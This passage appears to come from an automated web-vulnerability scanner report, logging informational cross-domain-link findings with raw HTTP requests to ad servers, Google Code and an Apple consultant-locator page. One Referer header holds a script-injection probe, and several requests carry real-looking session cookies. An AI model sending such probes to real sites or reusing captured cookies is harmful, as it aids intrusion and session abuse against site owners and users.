http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http://games.myyearbook.com//clickenc=http://adclick.g.doubleclick.net/aclk?sa=l&ai=Bi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB&num=1&sig=AOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g&client=ca-pub-7306919723827765&adurl=http%3a//bs.serving%2dsys.com/BurstingPipe/BannerRedirect.bs?cn=brd%26FlightID=2711514%26Page=%26PluID=0%26EyeblasterID=5684520%26Pos=4074588624772%26ord=%5btimestamp%5d

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=1 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/
Cookie: C4=; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; ActivityInfo=000iPlceU%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=lHQFb8QE0aSM00001lHQEb8QF0aSM00001; expires=Wed, 19-Oct-2011 14:01:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=al.q0000000002vH; expires=Wed, 19-Oct-2011 14:01:47 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 21 Jul 2011 18:01:47 GMT
Connection: close
Content-Length: 2393

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
</IMG>");if("http://www.panerabread.com/maketodaybetter" != ""){document.write("<A HREF='http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http://games.myyearbook.com//clickenc=http://adclick.g.doubleclick.net/aclk?sa=l&ai=Bi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB&num=1&sig=AOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g&client=ca-pub-7306919723827765&adurl=http%3a//bs.serving%2dsys.com/BurstingPipe/BannerRedirect.bs?cn=brd%26FlightID=2711514%26Page=%26PluID=0%26EyeblasterID=5684520%26Pos=4074588624772%26ord=%5btimestamp%5d' target=_blank><IMG src="+ebResourcePath+"/Site-1523/Type-0/40c26807-b79c-49d1-a9c4-7ccb24d34951.jpg width=728 height=90 title=" + '"' + "" + '"' + " border=0>
...[SNIP]...

18.47. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=B765081F39B1F7

The response contains the following link to another domain:

http://cms.quantserve.com/dpixel?eid=0&id=CAESEOxoCYxROLC8sEEVWNryUWE&cver=1

Request

GET /pixel?nid=B765081F39B1F7 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 302 Found
Location: http://cms.quantserve.com/dpixel?eid=0&id=CAESEOxoCYxROLC8sEEVWNryUWE&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 23 Jul 2011 04:49:10 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 281
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://cms.quantserve.com/dpixel?eid=0&id=CAESEOxoCYxROLC8sEEVWNryUWE&cver=1">here</A>
...[SNIP]...

18.48. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=xplusone1&_r=1

The response contains the following link to another domain:

http://m.xp1.ru4.com/um?_r=1&_o=62795&_i=52786&_u=CAESEJtsWevvgB4UOVjnnuLDoSw&cver=1&_r=1

Request

GET /pixel?nid=xplusone1&_r=1 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 302 Found
Location: http://m.xp1.ru4.com/um?_r=1&_o=62795&_i=52786&_u=CAESEJtsWevvgB4UOVjnnuLDoSw&cver=1&_r=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 21 Jul 2011 18:01:00 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 306
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://m.xp1.ru4.com/um?_r=1&_o=62795&_i=52786&_u=CAESEJtsWevvgB4UOVjnnuLDoSw&cver=1&_r=1">here</A>
...[SNIP]...

18.49. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=appnexus1

The response contains the following link to another domain:

http://adx.adnxs.com/mapuid?member=181&user=CAESEAivP-wt7aKur2tZ_DiVr5c&cver=1

Request

GET /pixel?nid=appnexus1 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 302 Found
Location: http://adx.adnxs.com/mapuid?member=181&user=CAESEAivP-wt7aKur2tZ_DiVr5c&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 21 Jul 2011 18:01:10 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://adx.adnxs.com/mapuid?member=181&user=CAESEAivP-wt7aKur2tZ_DiVr5c&cver=1">here</A>
...[SNIP]...

18.50. https://code.google.com/p/domsnitch/downloads/detail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://code.google.com
Path:	/p/domsnitch/downloads/detail

Issue detail

The page was loaded from a URL containing a query string:

https://code.google.com/p/domsnitch/downloads/detail?name=v0.707.crx&can=2&q=

The response contains the following links to other domains:

https://domsnitch.googlecode.com/files/v0.707.crx
https://ssl.gstatic.com/codesite/ph/8169703206223286781/css/ph_core.css
https://ssl.gstatic.com/codesite/ph/8169703206223286781/css/ph_detail.css
https://ssl.gstatic.com/codesite/ph/8169703206223286781/js/dit_scripts.js
https://ssl.gstatic.com/codesite/ph/8169703206223286781/js/ph_core.js
https://ssl.gstatic.com/codesite/ph/images/dl_arrow.gif
https://ssl.gstatic.com/codesite/ph/images/phosting.ico
https://ssl.gstatic.com/codesite/ph/images/search-48.gif

Request

GET /p/domsnitch/downloads/detail?name=v0.707.crx&can=2&q= HTTP/1.1
Host: code.google.com
Connection: keep-alive
Referer: https://code.google.com/p/domsnitch/downloads/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=247248150.1305748931.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; __utma=247248150.2016126898.1305748931.1305748931.1306544342.2; NID=49=nwK0YeFQgiA75AfdZgSdSHlwxJbK2A2cV_USi565w0PVqPxP8Z_r44EtseUIkjPH9QzYcj49dhKdG9KIrxQkEfj8lGl3kOkFx8-uLi3G6X3lprtx8Eqr5zx5hUV0AOyO

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:03:54 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: codesite
Content-Length: 9545
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="https://ssl.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

var cod
...[SNIP]...
<meta name="ROBOTS" content="NOARCHIVE">

<link type="text/css" rel="stylesheet" href="https://ssl.gstatic.com/codesite/ph/8169703206223286781/css/ph_core.css">

<link type="text/css" rel="stylesheet" href="https://ssl.gstatic.com/codesite/ph/8169703206223286781/css/ph_detail.css" >

<!--[if IE]>
...[SNIP]...
<a href="/p/domsnitch/">

<img src="https://ssl.gstatic.com/codesite/ph/images/search-48.gif" alt="Logo">

</a>
...[SNIP]...
<div class="box-inner">
<a

onclick="generateDownloadEvent(); return true;"

href="//domsnitch.googlecode.com/files/v0.707.crx"><img src="https://ssl.gstatic.com/codesite/ph/images/dl_arrow.gif" style="vertical-align:middle;" ></a> 
<a style="font-size: 140%"

onclick="generateDownloadEvent(); return true;"

href="//domsnitch.googlecode.com/files/v0.707.crx">v0.707.crx</a>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ssl.gstatic.com/codesite/ph/8169703206223286781/js/dit_scripts.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://ssl.gstatic.com/codesite/ph/8169703206223286781/js/ph_core.js"></script>
...[SNIP]...

18.51. http://consultants-locator.apple.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://consultants-locator.apple.com
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010

The response contains the following links to other domains:

http://apple.ugc.bazaarvoice.com/static/1029/bvapi.js
http://maps.google.com/maps/api/js?sensor=false

Request

GET /index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010 HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:47:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="container" class="floatcontainer">

<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://apple.ugc.bazaarvoice.com/static/1029/bvapi.js">
</script>
...[SNIP]...

18.52. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The page was loaded from a URL containing a query string:

http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd%3Bcontentid%3Db57d2ce1%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadhd%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3B~sscs%3D%3F&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276277259

The response contains the following links to other domains:

http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fc273d2028d2840&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADD+Medication&chash=-1457325181303199609&cscr=0.02297675795853138&cpos=4&creg=0&cnads=20&cpc=6.329999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fc273d2028d2840&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.10167374461889267&cpos=2&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fc273d2028d2840&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.34689033031463623&cpos=1&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fc273d2028d2840&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.16673068702220917&cpos=3&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fc273d2028d2840&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=Child+with+ADHD&chash=3007873813482410363&cscr=0.023930521681904793&cpos=6&creg=0&cnads=20&cpc=3.740000009536743&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fc273d2028d2840&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.0632365271449089&cpos=5&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1

Request

GET /dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd%3Bcontentid%3Db57d2ce1%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadhd%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3B~sscs%3D%3F&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276277259 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;sz=470x60;ord=716199259245381
Cookie: JSESSIONID=A0C9C5A977AB24ABD5D4CA49D185933D.dsat3; netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,&1091,992,www.lifescript.com,6,2,1,imp3fed4c7f34cb5610,1311276202616,"; netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276202617,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvb3V0X29mX2NvbnRyb2xfaXRfY291bGRfYmVfYWRoZC5hc3B4,US-TX-623-Dallas,6,2"

Response

18.53. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The page was loaded from a URL containing a query string:

http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer?tagid=1465&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fq%3B242224824%3B0-0%3B3%3B31210306%3B4307-300%2F250%3B37820453%2F37838301%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3Bdcopt%3Dist%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=250&adw=300&frd=1311276303096

The response contains the following links to other domains:

